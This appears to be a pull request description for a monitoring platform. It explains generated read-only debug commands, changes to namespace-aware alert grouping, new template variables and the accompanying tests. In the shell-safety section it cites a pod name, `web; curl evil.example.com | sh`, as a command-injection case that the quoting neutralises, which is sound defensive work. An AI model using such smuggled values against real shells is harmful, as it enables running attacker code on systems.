`SeriesDebugHints` turns the series labels into the first three-to-six commands an engineer would type, already filled in, with a Copy button. Per monitor type: `kubectl` for Kubernetes, `docker` / `podman` / `docker service` for containers, `df` / `du` / `lsof` / `iostat` for hosts, `qm` / `pct` / `pvesm` / `pvesh` for Proxmox, `ceph` for Ceph.

Three invariants, each with its own test block:

- **Read-only.** Nothing mutates, restarts or deletes. A test asserts this against every emitted command for every monitor type.
- **Never half-filled.** A command is emitted only when every identifier it interpolates is known, so no `kubectl logs  -n ` reaches a copy-paste button. When the namespace is unknown, `-n` is omitted rather than guessed as `default`.
- **Shell-safe.** Label values are telemetry — ultimately whatever an agent, a Prometheus scrape, or a user's own `oneuptime.captureMetric()` chose to emit. Values are single-quoted with the close/escape/reopen dance, so a pod named `web; curl evil.example.com | sh` renders as one inert argument.

### 3. Recommendation templates group by the full identity

| Template | Before | After |
|---|---|---|
| `k8s-crashloopbackoff` | pod | **namespace + pod + container** |
| `k8s-pod-cpu-limit-saturation` | pod | **namespace + pod** |
| `k8s-pod-memory-limit-saturation` | pod | **namespace + pod** |
| `k8s-deployment-replica-mismatch` | deployment | **namespace + deployment** |
| `k8s-daemonset-unavailable` | daemonset | **namespace + daemonset** |
| `k8s-job-failures` | job | **namespace + job** |
| `k8s-hpa-at-max-replicas` | hpa | **namespace + hpa** |
| `host-high-filesystem` | mountpoint | **mountpoint + device** |

This is a correctness fix as well as a labelling one: two same-named objects in different namespaces previously collapsed into one series, so the second one's breach was silenced behind the first one's open alert.

**Why not node on the pod ratios.** The two pod-saturation templates are ratios, and the two queries join by series fingerprint — a key only one side carries splits them into fingerprints that never meet, the formula evaluates against an empty operand, and the monitor *silently stops alerting*. `k8s.namespace.name` is stamped directly by both `kubeletstats` and the `k8s_cluster` receiver and is safe. `k8s.node.name` on the `k8s_cluster` side can only arrive via the best-effort `k8sattributes` processor, so it is deliberately left out of every ratio template's key set. This is documented on `buildKubernetesRatioMonitorConfig` and asserted by a test that every query of a template shares one key set.

The other resource types (Docker, Podman, Swarm, Ceph, IoT, Proxmox) already grouped by their correct per-entity identity — they gain the title, description and commands without a grouping change.

### 4. New template variables

`{{seriesResourceSuffix}}`, `{{seriesResourceSummary}}`, `{{seriesResourceBlock}}` and `{{seriesDebugCommands}}`, documented in the template-variables modal for every monitor type.

They are **always defined**, resolving to `""` on an ungrouped monitor. That is the point: `VMUtil.replaceValueInPlace` leaves a placeholder it cannot resolve in the output verbatim, so `{{resource.k8s.pod.name}}` is only safe in a template certain to be grouped by that attribute, whereas `{{seriesResourceSuffix}}` is safe anywhere.

### 5. The Affected Resource table reads like English

Rendered from the same `SeriesLabelDisplay` the title is built from, so the page and the notification agree on naming ("Pod", not `resource.k8s.pod.name`) and ordering. The raw attribute key stays underneath, since that is what you paste into a Group By or a metric filter to look at the same series yourself.

## Tests

718 assertions pass across the affected suites (699 in the main run plus the 19 in the template-variable suite, which needs Node 26 locally because `MonitorTemplateUtil` pulls in `isolated-vm`). Five new files:

- `Common/Tests/Types/Monitor/SeriesContext/SeriesLabelDisplay.test.ts` — naming, priority ordering, the `resource.` prefix being invisible, empty values dropped (the exact shape `MetricSeriesFingerprint` produces for a missing attribute), duplicate-spelling collapse, multi-valued labels, objects refused, stable ordering.
- `Common/Tests/Types/Monitor/SeriesContext/SeriesDebugHints.test.ts` — per-type commands, shell-injection cases, the read-only sweep over every type, the no-blank-interpolation sweep, Proxmox composite-id parsing.
- `Common/Tests/Server/Utils/Monitor/SeriesContextEnricher.test.ts` — the regression itself (two series of one monitor no longer share a title), no-op on ungrouped monitors, not fighting a user's own template, idempotency, short-value false-positive matching.
- `Common/Tests/Server/Utils/Monitor/MonitorTemplateUtilSeriesContext.test.ts` — the always-defined rule, and that the prototype-pollution guard on label keys still holds.
- `Common/Tests/Types/Monitor/Recommendation/MonitorRecommendationAlertDebuggability.test.ts` — runs the **whole catalog**: every grouped template's key set is nameable, its alert and incident titles carry the identity, its description carries every label, and every infrastructure template hands the engineer a first command. A new resource type is covered the day it is registered.

Plus updated expectations in the two existing group-by guard tests, with new cases asserting that namespace-scoped objects group by namespace and that every query of a template shares one group-by key set.

## Behavioural note

An alert grouping rule with `groupByAlertTitle` enabled will now group per-series rather than per-monitor, because the titles genuinely are different. `groupByMonitor` gives the previous coarser behaviour.
